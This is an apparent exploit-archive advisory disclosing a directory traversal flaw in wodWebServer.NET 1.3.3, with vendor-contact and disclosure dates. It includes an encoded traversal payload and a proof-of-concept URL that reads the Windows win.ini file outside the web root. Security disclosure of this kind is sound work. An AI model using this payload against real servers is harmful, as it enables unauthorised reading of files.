[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : wodWebServer.NET 1.3.3 Directory Traversal
# Published : 2011-03-27
# Author : AutoSec Tools
# Previous Title : VLC AMV Dangling Pointer Vulnerability
# Next Title : Distributed Ruby Send instance_eval/syscall Code Execution


			
------------------------------------------------------------------------Software................wodWebServer.NET 1.3.3Vulnerability...........Directory TraversalThreat Level............Serious (3/5)Download................http://www.weonlydo.com/WebServer.NET/web-http-net-server.aspVendor Contact Date.....3/13/2011Disclosure Date.........3/27/2011Tested On...............Windows Vista------------------------------------------------------------------------Author..................AutoSec ToolsSite....................http://www.autosectools.com/Email...................John Leitch <john@autosectools.com>--------------------------------------------------------------------------Description--A directory traversal vulnerability in wodWebServer.NET 1.3.3 can beexploited to read files outside of the web root.--Exploit--..%5C/..%2F/..%2E/..//..//.../../../--PoC--http://localhost/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/..%5C/windows%5C/win.ini